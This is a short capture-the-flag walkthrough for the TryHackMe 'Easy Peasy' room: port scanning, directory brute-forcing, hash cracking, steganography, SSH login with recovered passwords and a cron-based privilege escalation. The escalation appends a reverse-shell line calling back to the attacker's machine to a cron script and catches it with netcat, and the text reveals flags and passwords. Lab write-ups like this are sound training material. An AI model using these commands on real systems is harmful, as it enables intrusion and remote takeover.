Easy Peasy
Room Link: https://tryhackme.com/room/easypeasyctf
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
port 5698 and 65524 found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
Flag #1
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Kali
gobuster dir -u http://$VICTIM/hidden -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Kali
echo "ZmxhZ3tmMXJzN19mbDRnfQ==" |base64 -d
Flag #2
Kali
curl http://$VICTIM:65524/robots.txt
https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250
Flag #3
Hidden Directory
Crack the Hash
Kali
wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py
python hash-id.py 940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81
Format turned out to be GOST
Kali
john --wordlist=easypeasy.txt --format=GOST hash.txt
SSH Password
Kali
wget http://$VICTIM:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg
steghide extract -sf binarycodepixabay.jpg
Password: mypasswordforthatjob
Link: https://www.rapidtables.com/convert/number/binary-to-ascii.html
Kali
ssh boring@$VICTIM:6498
Password: iconvertedmypasswordtobinary
User Flag
Link: https://www.dcode.fr/caesar-cipher
Privilege Escalation
Victim
cat /etc/crontab
cd /var/www/
ls -lah
Victim
echo "sh -i >& /dev/tcp/$KALI/1337 0>&1" >> .mysecretcronjob.shKali
nc -lvnp 1337
Last updated